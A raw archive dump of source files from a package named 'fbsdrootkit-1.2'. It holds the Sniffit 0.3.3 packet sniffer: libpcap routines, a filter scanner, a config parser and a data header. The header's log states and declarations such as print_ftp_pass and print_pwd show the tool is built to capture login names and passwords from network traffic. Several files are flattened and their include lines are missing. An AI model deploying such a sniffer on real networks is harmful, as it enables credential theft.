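		if (fread((char *)tp, 1, (size_t)hdr->caplen, fp) !=
		    (size_t)hdr->caplen) {
			sprintf(p->errbuf, "truncated dump file");
			return (-1);
		}
		memcpy((char *)buf, (char *)tp, buflen);
		/* Only buflen bytes were kept; report exactly that many. */
		hdr->caplen = buflen;
	} else {
		/*
		 * read the packet itself; counting bytes rather than items
		 * lets a zero-length record succeed instead of being
		 * reported as truncated.
		 */
		if (fread((char *)buf, 1, (size_t)hdr->caplen, fp) !=
		    (size_t)hdr->caplen) {
			sprintf(p->errbuf, "truncated dump file");
			return (-1);
		}
	}
	return (0);
}

/*
 * Print out packets stored in the file initialized by sf_read_init().
 * If cnt > 0, return after 'cnt' packets, otherwise continue until eof.
 *
 * Each packet that passes the installed filter (or every packet when no
 * filter is installed) is handed to 'callback' together with 'user'.
 * Returns the number of packets delivered when the count is reached, 0 at
 * end of file, or the negative status from sf_next_packet() on error.
 */
int
pcap_offline_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user)
{
	struct bpf_insn *fcode = p->fcode.bf_insns;
	int status = 0;
	int n = 0;

	while (status == 0) {
		struct pcap_pkthdr h;

		status = sf_next_packet(p, &h, p->buffer, p->bufsize);
		if (status) {
			/* 1 is sf_next_packet()'s "no more packets" status */
			if (status == 1)
				return (0);
			return (status);
		}

		if (fcode == NULL ||
		    bpf_filter(fcode, p->buffer, h.len, h.caplen)) {
			(*callback)(user, &h, p->buffer);
			if (++n >= cnt && cnt > 0)
				break;
		}
	}
	/*XXX this breaks semantics tcpslice expects */
	return (n);
}

/*
 * Output a packet to the initialized dump file.
 * 'user' is the FILE * returned (as a pcap_dumper_t *) by pcap_dump_open();
 * write errors are deliberately ignored here.
 */
void
pcap_dump(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)
{
	FILE * f = (FILE *)user;
	(void)fwrite((char *)h, sizeof(*h), 1, f);
	(void)fwrite((char *)sp, h->caplen, 1, f);
}

/*
 * Initialize so that sf_write() will output to the file named 'fname'.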
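*/
/*
 * Open 'fname' ("-" means stdout) for writing and emit the savefile header
 * built from p's link type, time zone offset and snapshot length.
 *
 * Returns the stream cast to pcap_dumper_t *, or NULL with a message in
 * p->errbuf when the file cannot be opened or the header cannot be
 * written.  The message is length-bounded so that an over-long path
 * cannot overrun p->errbuf (presumably PCAP_ERRBUF_SIZE bytes; its
 * declaration lives in pcap-int.h -- TODO confirm).
 */
pcap_dumper_t *
pcap_dump_open(pcap_t *p, char *fname)
{
	FILE *f;

	if (fname[0] == '-' && fname[1] == '\0')
		f = stdout;
	else {
		f = fopen(fname, "w");
		if (f == NULL) {
			sprintf(p->errbuf, "%.150s: %.100s",
			    fname, pcap_strerror(errno));
			return (NULL);
		}
	}
	/* A dump file without its header cannot be read back; fail early. */
	if (sf_write_header(f, p->linktype, p->tzoff, p->snapshot) < 0) {
		sprintf(p->errbuf, "%.150s: %.100s",
		    fname, pcap_strerror(errno));
		if (f != stdout)
			(void)fclose(f);
		return (NULL);
	}
	return ((pcap_dumper_t *)f);
}

/*
 * Close a dump file opened with pcap_dump_open().
 */
void
pcap_dump_close(pcap_dumper_t *p)
{
	fclose((FILE *)p);
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/scanner.l100400 764 764 10177 6226213211 16474 0ustar dfdf%{
/*
 * Copyright (c) 1988, 1989, 1990, 1991, 1992, 1993, 1994
 *	The Regents of the University of California.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that: (1) source code distributions
 * retain the above copyright notice and this paragraph in its entirety, (2)
 * distributions including binary code include the above copyright notice and
 * this paragraph in its entirety in the documentation or other materials
 * provided with the distribution, and (3) all advertising materials mentioning
 * features or use of this software display the following acknowledgement:
 * ``This product includes software developed by the University of California,
 * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of
 * the University nor the names of its contributors may be used to endorse
 * or promote products derived from this software without specific prior
 * written permission.
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.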
*/ #ifndef lint static char rcsid[] = "@(#) $Header: scanner.l,v 1.40 94/06/10 17:21:44 mccanne Exp $ (LBL)"; #endif #include #include #include #include #include #include "gencode.h" #include "tokdefs.h" #ifndef __GNUC__ #define inline #endif static int stoi(char *); static inline int xdtoi(int); #ifdef FLEX_SCANNER #undef YY_INPUT #define YY_INPUT(buf, result, max)\ {\ char *src = in_buffer;\ int i;\ \ if (*src == 0)\ result = YY_NULL;\ else {\ for (i = 0; *src && i < max; ++i)\ buf[i] = *src++;\ in_buffer += i;\ result = i;\ }\ } #else #undef getc #define getc(fp) (*in_buffer == 0 ? EOF : *in_buffer++) #endif #define yylval pcap_lval extern YYSTYPE yylval; static char *in_buffer; %} N ([0-9]+|(0X|0x)[0-9A-Fa-f]+) B ([0-9A-Fa-f][0-9A-Fa-f]?) %a 3000 %% dst return DST; src return SRC; link|ether|ppp|slip return LINK; fddi return LINK; arp return ARP; rarp return RARP; ip return IP; tcp return TCP; udp return UDP; icmp return ICMP; decnet return DECNET; lat return LAT; moprc return MOPRC; mopdl return MOPDL; host return HOST; net return NET; port return PORT; proto return PROTO; gateway return GATEWAY; less return LESS; greater return GREATER; byte return BYTE; broadcast return TK_BROADCAST; multicast return TK_MULTICAST; and|"&&" return AND; or|"||" return OR; not return '!'; len|length return LEN; inbound return INBOUND; outbound return OUTBOUND; [ \n\t] ; [+\-*/:\[\]!<>()&|=] return yytext[0]; ">=" return GEQ; "<=" return LEQ; "!=" return NEQ; "==" return '='; "<<" return LSH; ">>" return RSH; {N} { yylval.i = stoi((char *)yytext); return NUM; } ({N}\.{N})|({N}\.{N}\.{N})|({N}\.{N}\.{N}\.{N}) { yylval.s = sdup((char *)yytext); return HID; } {B}:{B}:{B}:{B}:{B}:{B} { yylval.e = pcap_ether_aton((char *)yytext); return EID; } {B}:+({B}:+)+ { bpf_error("bogus ethernet address %s", yytext); } [A-Za-z][-_.A-Za-z0-9]* { yylval.s = sdup((char *)yytext); return ID; } "\\"[^ !()\n\t]+ { yylval.s = sdup((char *)yytext + 1); return ID; } [^ \[\]\t\n\-_.A-Za-z0-9!<>()&|=]+ { 
bpf_error("illegal token: %s\n", yytext); } . { bpf_error("illegal char '%c'", *yytext); } %% void lex_init(buf) char *buf; { in_buffer = buf; } /* * Also define a yywrap. Note that if we're using flex, it will * define a macro to map this identifier to pcap_wrap. */ int yywrap() { return 1; } /* Hex digit to integer. */ static inline int xdtoi(c) register int c; { if (isdigit(c)) return c - '0'; else if (islower(c)) return c - 'a' + 10; else return c - 'A' + 10; } /* * Convert string to integer. Just like atoi(), but checks for * preceding 0x or 0 and uses hex or octal instead of decimal. */ static int stoi(s) char *s; { int base = 10; int n = 0; if (*s == '0') { if (s[1] == 'x' || s[1] == 'X') { s += 2; base = 16; } else { base = 8; s += 1; } } while (*s) n = n * base + xdtoi(*s++); return n; } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap.c.orig100600 764 764 10031 6226213211 16703 0ustar dfdf/* * Copyright (c) 1993, 1994, 1995 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. 
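*
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#ifndef lint
static char rcsid[] =
    "@(#) $Header: pcap.c,v 1.12+ 94/06/12 14:32:23 leres Exp $ (LBL)";
#endif

/*
 * NOTE(review): the header names on the bare #include lines below were lost
 * when this listing was extracted; they are kept exactly as found.
 */
#include
#include
#include "pcap-int.h"

/*
 * Deliver up to 'cnt' packets to 'callback'.  A handle opened on a
 * savefile is served by pcap_offline_read(); otherwise pcap_read() is
 * retried until it returns something other than 0.
 */
int
pcap_dispatch(pcap_t *p, int cnt, pcap_handler callback, u_char *user)
{
	register int cc;

	if (p->sf.rfile != NULL)
		return (pcap_offline_read(p, cnt, callback, user));
	/* XXX keep reading until we get something (or an error occurs) */
	do {
		cc = pcap_read(p, cnt, callback, user);
	} while (cc == 0);
	return (cc);
}

/*
 * Call pcap_dispatch() repeatedly.  Returns its result as soon as that is
 * <= 0, or 0 once 'cnt' packets (when cnt > 0) have been delivered.
 */
int
pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user)
{
	for (;;) {
		int n = pcap_dispatch(p, cnt, callback, user);
		if (n <= 0)
			return (n);
		if (cnt > 0) {
			cnt -= n;
			if (cnt <= 0)
				return (0);
		}
	}
}

/* Carries the result of a single-packet dispatch back to pcap_next(). */
struct singleton {
	struct pcap_pkthdr *hdr;
	const u_char *pkt;
};

/*
 * pcap_handler used by pcap_next(): copies the packet header into the
 * caller's structure and records the packet data pointer.
 */
static void
pcap_oneshot(u_char *userData, const struct pcap_pkthdr *h, const u_char *pkt)
{
	struct singleton *sp = (struct singleton *)userData;
	*sp->hdr = *h;
	sp->pkt = pkt;
}

/*
 * Return a pointer to the next packet and fill in *h, or NULL when
 * pcap_dispatch() delivers nothing.
 */
const u_char *
pcap_next(pcap_t *p, struct pcap_pkthdr *h)
{
	struct singleton s;

	s.hdr = h;
	s.pkt = NULL;
	if (pcap_dispatch(p, 1, pcap_oneshot, (u_char*)&s) <= 0)
		return (0);
	return (s.pkt);
}

/* Accessor: link-layer type of the handle. */
int
pcap_datalink(pcap_t *p)
{
	return (p->linktype);
}

/* Accessor: snapshot length of the handle. */
int
pcap_snapshot(pcap_t *p)
{
	return (p->snapshot);
}

/* Accessor: non-zero when the savefile was written in the other byte order. */
int
pcap_is_swapped(pcap_t *p)
{
	return (p->sf.swapped);
}

/* Accessor: major version recorded in the savefile header. */
int
pcap_major_version(pcap_t *p)
{
	return (p->sf.version_major);
}

/* Accessor: minor version recorded in the savefile header. */
int
pcap_minor_version(pcap_t *p)
{
	return (p->sf.version_minor);
}

/* Accessor: stdio stream of an offline handle (NULL otherwise). */
FILE *
pcap_file(pcap_t *p)
{
	return (p->sf.rfile);
}

/* Accessor: file descriptor stored in the handle. */
int
pcap_fileno(pcap_t *p)
{
	return (p->fd);
}

/* Print "prefix: <last error message>" on stderr. */
void
pcap_perror(pcap_t *p, char *prefix)
{
	fprintf(stderr, "%s: %s\n", prefix, p->errbuf);
}

/* Accessor: the handle's error message buffer. */
char *
pcap_geterr(pcap_t *p)
{
	return (p->errbuf);
}

/*
 * Not all systems have strerror().
 *
 * Returns the sys_errlist entry for errnum, or a formatted "Unknown error"
 * string held in a static buffer (overwritten by the next such call).
 * The buffer is sized for the 15-character prefix, the longest possible
 * int rendering and the terminating NUL; the former 20 bytes were too
 * small for any five-digit or negative error number.
 */
char *
pcap_strerror(int errnum)
{
	extern int sys_nerr;
	extern char *sys_errlist[];
	static char ebuf[32];

	if ((unsigned int)errnum < sys_nerr)
		return (sys_errlist[errnum]);
	(void)sprintf(ebuf, "Unknown error: %d", errnum);
	return(ebuf);
}

/*
 * Release everything owned by the handle: the descriptor (if any), the
 * savefile stream and its buffer, or the live-capture buffer, then the
 * handle itself.  A savefile stream that is stdin is not closed, since
 * it was not opened by this library.
 */
void
pcap_close(pcap_t *p)
{
	/*XXX*/
	if (p->fd >= 0)
		close(p->fd);
	if (p->sf.rfile != NULL) {
		if (p->sf.rfile != stdin)
			fclose(p->sf.rfile);
		if (p->sf.base != NULL)
			free(p->sf.base);
	} else if (p->buffer != NULL)
		free(p->buffer);

	free(p);
}
fbsdrootkit-1.2/sniffit.0.3.3/pcap.h100600 764 764 11373 6226213211 14351 0ustar dfdf/*
 * Copyright (c) 1993, 1994
 *	The Regents of the University of California.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the Computer Systems
 *	Engineering Group at Lawrence Berkeley Laboratory.
 * 4.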
Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#) $Header: pcap.h,v 1.15 94/06/14 20:03:34 leres Exp $ (LBL) */ #ifndef lib_pcap_h #define lib_pcap_h #include #include #include #include #define PCAP_VERSION_MAJOR 2 #define PCAP_VERSION_MINOR 4 #define PCAP_ERRBUF_SIZE 256 /* * Compatibility for systems that have a bpf.h that * predates the bpf typedefs for 64-bit support. */ #if BPF_RELEASE - 0 < 199406 typedef long bpf_int32; typedef u_long bpf_u_int32; #endif typedef struct pcap pcap_t; typedef struct pcap_dumper pcap_dumper_t; /* * The first record in the file contains saved values for some * of the flags used in the printout phases of tcpdump. * Many fields here are longs so compilers won't insert unwanted * padding; these files need to be interchangeable across architectures. 
*/ struct pcap_file_header { bpf_u_int32 magic; u_short version_major; u_short version_minor; bpf_int32 thiszone; /* gmt to local correction */ bpf_u_int32 sigfigs; /* accuracy of timestamps */ bpf_u_int32 snaplen; /* max length saved portion of each pkt */ bpf_u_int32 linktype; /* data link type (DLT_*) */ }; /* * Each packet in the dump file is prepended with this generic header. * This gets around the problem of different headers for different * packet interfaces. */ struct pcap_pkthdr { struct timeval ts; /* time stamp */ bpf_u_int32 caplen; /* length of portion present */ bpf_u_int32 len; /* length this packet (off wire) */ }; /* * As returned by the pcap_stats() */ struct pcap_stat { u_int ps_recv; /* number of packets received */ u_int ps_drop; /* number of packets dropped */ u_int ps_ifdrop; /* drops by interface XXX not yet supported */ }; typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *, const u_char *); char *pcap_lookupdev(char *); int pcap_lookupnet(char *, u_long *, u_long *, char *); pcap_t *pcap_open_live(char *, int, int, int, char *); pcap_t *pcap_open_offline(char *, char *); void pcap_close(pcap_t *); int pcap_loop(pcap_t *, int, pcap_handler, u_char *); int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *); const u_char* pcap_next(pcap_t *, struct pcap_pkthdr *); int pcap_stats(pcap_t *, struct pcap_stat *); int pcap_setfilter(pcap_t *, struct bpf_program *); void pcap_perror(pcap_t *, char *); char *pcap_strerror(int); char *pcap_geterr(pcap_t *); int pcap_compile(pcap_t *, struct bpf_program *, char *, int, u_long); /* XXX */ int pcap_freecode(pcap_t *, struct bpf_program *); int pcap_datalink(pcap_t *); int pcap_snapshot(pcap_t *); int pcap_is_swapped(pcap_t *); int pcap_major_version(pcap_t *); int pcap_minor_version(pcap_t *); /* XXX */ FILE *pcap_file(pcap_t *); int pcap_fileno(pcap_t *); pcap_dumper_t *pcap_dump_open(pcap_t *, char *); void pcap_dump_close(pcap_dumper_t *); void pcap_dump(u_char *, const struct 
pcap_pkthdr *, const u_char *); /* XXX this guy lives in the bpf tree */ u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); char *bpf_image(struct bpf_insn *, int); #endif fbsdrootkit-1.2/sniffit.0.3.3/sample_config_file100600 764 764 352 6226213211 16740 0ustar dfdf# Sniffit V.0.3.3 Sample Config file -- Brecht Claerhout # First select all packets! select both mhosts 1 select both mhosts 2 # Now deselect all packets from/to those damn 'surfers' deselect both port 80 deselect both port 8001 fbsdrootkit-1.2/sniffit.0.3.3/sn_cfgfile.h100600 764 764 25026 6226213211 15525 0ustar dfdfvoid clear_list_buffer (struct cfg_file_contense *help) { help->host[0]=0; help->priority=0; help->port=0; help->wildcard=0; } struct cfg_file_contense *adjust_select_from_list (void) { Priority++; select_from_length++; select_from_list=(struct cfg_file_contense *)realloc(select_from_list, select_from_length*sizeof(struct cfg_file_contense)); if(select_from_list==NULL) {printf("Sniffit hartattack... out of memory!\n"); exit(1);} clear_list_buffer(&(select_from_list[select_from_length-1])); return &(select_from_list[select_from_length-1]); } struct cfg_file_contense *adjust_select_to_list (void) { Priority++; select_to_length++; select_to_list=(struct cfg_file_contense *)realloc(select_to_list, select_to_length*sizeof(struct cfg_file_contense)); if(select_to_list==NULL) {printf("Sniffit hartattack... out of memory!\n"); exit(1);} clear_list_buffer(&(select_to_list[select_to_length-1])); return &(select_to_list[select_to_length-1]); } struct cfg_file_contense *adjust_deselect_from_list (void) { Priority++; deselect_from_length++; deselect_from_list=(struct cfg_file_contense *)realloc(deselect_from_list, deselect_from_length*sizeof(struct cfg_file_contense)); if(deselect_from_list==NULL) {printf("Sniffit hartattack... 
out of memory!\n"); exit(1);} clear_list_buffer(&(deselect_from_list[deselect_from_length-1])); return (&(deselect_from_list[deselect_from_length-1])); } struct cfg_file_contense *adjust_deselect_to_list (void) { Priority++; deselect_to_length++; deselect_to_list=(struct cfg_file_contense *)realloc(deselect_to_list, deselect_to_length*sizeof(struct cfg_file_contense)); if(deselect_to_list==NULL) {printf("Sniffit hartattack... out of memory!\n"); exit(1);} clear_list_buffer(&(deselect_to_list[deselect_to_length-1])); return &(deselect_to_list[deselect_to_length-1]); } char *clean_string (char *string) { char help[20]; int i, j; j=0; for(i=0;ihost,dot_notation); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* select from port */ { help=adjust_select_from_list(); help->port=atoi( strtok(NULL," ") ); help->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* select from mhosts */ { help=adjust_select_from_list(); strcpy(help->host, clean_string(strtok(NULL," "))); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; help->wildcard=1; return; } } if(strcmp(strlower(field),"to")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"host")==0) /* select to host */ { help=adjust_select_to_list(); make_nr_dot(strtok(NULL," ")); strcpy(help->host,dot_notation); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* select to port */ { help=adjust_select_to_list(); help->port=atoi( strtok(NULL," ") ); help->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* select to mhosts */ { help=adjust_select_to_list(); strcpy(help->host, clean_string(strtok(NULL," "))); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; help->wildcard=1; return; } } if(strcmp(strlower(field),"both")==0) { field=strtok(NULL," "); 
if(strcmp(strlower(field),"host")==0) /* select both host */ { help=adjust_select_from_list(); helpp=adjust_select_to_list(); make_nr_dot(strtok(NULL," ")); strcpy(help->host,dot_notation); strcpy(helpp->host,dot_notation); if( (field=strtok(NULL," "))!=NULL) {help->port=atoi(field); helpp->port=atoi(field);} help->priority=Priority; helpp->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* select both port */ { help=adjust_select_from_list(); helpp=adjust_select_to_list(); field=strtok(NULL," "); help->port=atoi(field); helpp->port=atoi(field); help->priority=Priority; helpp->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* select both mhosts */ { help=adjust_select_from_list(); helpp=adjust_select_to_list(); field=clean_string(strtok(NULL," ")); strcpy(help->host, field); strcpy(helpp->host, field); if( (field=strtok(NULL," "))!=NULL) {help->port=atoi(field); helpp->port=atoi(field);} help->priority=Priority; helpp->priority=Priority; help->wildcard=1; helpp->wildcard=1; return; } } } if(strcmp(strlower(field),"deselect")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"from")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"host")==0) /* select from host */ { help=adjust_deselect_from_list(); make_nr_dot(strtok(NULL," ")); strcpy(help->host,dot_notation); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* select from port */ { help=adjust_deselect_from_list(); help->port=atoi(strtok(NULL," ")); help->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* select from mhosts */ { help=adjust_deselect_from_list(); strcpy(help->host, clean_string(strtok(NULL," "))); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; help->wildcard=1; return; } } if(strcmp(strlower(field),"to")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"host")==0) /* deselect to host */ { 
help=adjust_deselect_to_list(); make_nr_dot(strtok(NULL," ")); strcpy(help->host,dot_notation); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* deselect to port */ { help=adjust_deselect_to_list(); help->port=atoi(strtok(NULL," ")); help->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* deselect to mhosts */ { help=adjust_deselect_to_list(); strcpy(help->host, clean_string(strtok(NULL," "))); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; help->wildcard=1; return; } } if(strcmp(strlower(field),"both")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"host")==0) /* deselect both host */ { help=adjust_deselect_from_list(); helpp=adjust_deselect_to_list(); make_nr_dot(strtok(NULL," ")); strcpy(help->host,dot_notation); strcpy(helpp->host,dot_notation); if( (field=strtok(NULL," "))!=NULL) {help->port=atoi(field); helpp->port=atoi(field);} help->priority=Priority; helpp->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* deselect both port */ { help=adjust_deselect_from_list(); helpp=adjust_deselect_to_list(); field=strtok(NULL," "); help->port=atoi(field); helpp->port=atoi(field); help->priority=Priority; helpp->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* deselect both mhosts */ { help=adjust_deselect_from_list(); helpp=adjust_deselect_to_list(); field=clean_string(strtok(NULL," ")); strcpy(help->host, field); strcpy(helpp->host, field); if( (field=strtok(NULL," "))!=NULL) {help->port=atoi(field); helpp->port=atoi(field);} help->priority=Priority; helpp->priority=Priority; help->wildcard=1; helpp->wildcard=1; return; } } } } } void read_cfg_file (char *file) { FILE *cfgfile; size_t line_length; char lineptr[260]; select_from_list=NULL; select_to_list=NULL; deselect_from_list=NULL; deselect_to_list=NULL; Priority=0; if((cfgfile = fopen(file,"r"))==NULL) {printf("Couldn't 
find config file... giving up.\n"); exit(1);} while(feof(cfgfile)==0) { fgets(lineptr,259,cfgfile); if(feof(cfgfile)==0) { interprete_line(lineptr);} } fclose(cfgfile); }; fbsdrootkit-1.2/sniffit.0.3.3/sn_data.h100600 764 764 15737 6226213211 15047 0ustar dfdf/* Sniffit Data File -- Brecht Claerhout */ /**** Handler function ******************************************************/ #ifdef INCLUDE_INTERFACE typedef void (*sig_hand)(int ); /* sighandler_t gave errors, weird */ #endif /**** Global data **********************************************************/ struct file_info { char proto, filename[50]; FILE *f; unsigned long bytes; unsigned long exp_seq; /* expected seq to avoid double logging */ int time_out; char log; /* log=0 : do nothing */ /* log=1 : log 'login' */ /* log=2 : 'login' logged */ /* log=3 : log password */ /* log=4 : password logged */ /* log=99 : no more detection */ char scroll_buf[SCBUF+1]; /* scroll buffer */ char *buffer; /* pointer to a buffer */ struct file_info *next; }; pcap_t *dev_desc; void *start_dynam; int dynam_len; char Logfile[250]; /* name of logfile */ FILE *LogFILE; /* logfile stream */ char *IP; unsigned long SNIFLEN; /* bytes we need to snif */ short DEST_PORT; /* destination port */ char non_printable, *logging_device; /**** Global data (config) **************************************************/ struct cfg_file_contense { unsigned char host[16]; unsigned int priority; unsigned char wildcard; unsigned short port; }; struct cfg_file_contense *select_from_list; /* pointers for cfg lists */ struct cfg_file_contense *select_to_list; struct cfg_file_contense *deselect_from_list; struct cfg_file_contense *deselect_to_list; int select_from_length=0; /* length of cfg lists */ int select_to_length=0; int deselect_from_length=0; int deselect_to_length=0; int Priority=0; /* The higher the priority, the more important */ char dot_notation[20]; /* for easy working, Q&D */ /**** Global data (interactive) 
*********************************************/ #ifdef INCLUDE_INTERFACE /**** shared memory pointers ************************************************/ char *SHARED, *connection_data, *timing, *running_connections, *logged_connections; int *LISTlength, *DATAlength, memory_id; unsigned int *TCP_nr_of_packets, *ICMP_nr_of_packets, *UDP_nr_of_packets; unsigned int *IP_nr_of_packets; unsigned long *TCP_bytes_in_packets, *UDP_bytes_in_packets; /**** data structures *******************************************************/ struct shared_conn_data /* shared memory connection datastructure */ { char connection [CONN_NAMELEN]; /* full ID string of conn */ int timeout; }; struct shared_logged_conn /* shared memory logging datastructure */ { char log_enter [CONN_NAMELEN]; /* normal logging */ }; struct snif_mask /* struct for mask */ { unsigned long source_ip, destination_ip; unsigned short source_port, destination_port; }; struct snif_mask *mask; struct shared_logged_conn *log_conn; FILE *log_dev_stream; struct stat log_dev_stat; volatile int LOGGING=0, screen_busy=0; char PACKET_INFO; int POINTpos=0, LISTpos=0; unsigned char COLOR_AVAIL=0; WINDOW *menu_window; struct box_window {WINDOW *main_window,*work_window;}; struct box_window data_box, main_box, mask_box, packets_box; int Pid=0; #endif /**** Sniffit functions *****************************************************/ int check_packet(unsigned long, const struct packetheader *, const unsigned char *, char *, char *, struct unwrap *, char *, int); pcap_handler packethandler(u_char *, const struct packetheader *, const unsigned char *); void print_iphead (struct IP_header *, char); static unsigned long getaddrbyname(char *); void quit (char *); void reset_all (void); char *strlower (char *); struct file_info *add_dynam (char *, char, char, unsigned long, int); void delete_dynam (char *, char, char); void record_buf(struct file_info *, unsigned long, char *, int, int); void sb_shift(struct file_info *); void sbuf_update(struct 
file_info *, unsigned long, char *, int); struct file_info *search_dynam(char *, char); void my_exit (void); /**** Sniffit functions (config) ********************************************/ void clear_list_buffer (struct cfg_file_contense *); struct cfg_file_contense *adjust_select_from_list (void); struct cfg_file_contense *adjust_select_to_list (void); struct cfg_file_contense *adjust_deselect_from_list (void); struct cfg_file_contense *adjust_deselect_to_list (void); char *clean_string (char *); char *clean_filename (char *); void make_nr_dot (char *); void interprete_line (char *); void read_cfg_file (char *); /**** Sniffit functions (logfile) *******************************************/ void logfile_exit (void); char *gettime (void); void print_logline (char *); void print_ftp_user (char *, char *); void print_ftp_pass(char *, char *); void print_login (char *, char *); void print_pwd (char *, char *); void print_conn (char *, char *); void open_logfile (void); /**** Sniffit functions (packets) *******************************************/ unsigned short in_cksum(unsigned short *,int); int unwrap_packet (const unsigned char *, struct unwrap *); /**** Interface functions ***************************************************/ #ifdef INCLUDE_INTERFACE int add_itemlist(char *, char *); void child_exit (void); void clear_shared_mem(char); void data_device (char *, int); void data_window (struct box_window *, struct box_window *, int, int, int, int, char *, int); int del_itemlist(char *, char *); void exec_mask (void); void f_box_window (struct box_window *, int, int, int, int, int); void fill_box_window (struct box_window *, char *, int, int, int); void forced_refresh (void); void init_screen (void); char *input_field(char *, char *); void interaction (int); void mask_status (struct box_window *); void mem_exit (void); void menu_line (void); void point_item (struct box_window *, char *, int, int, int, int); void run_interface (void); void screen_exit (void); void 
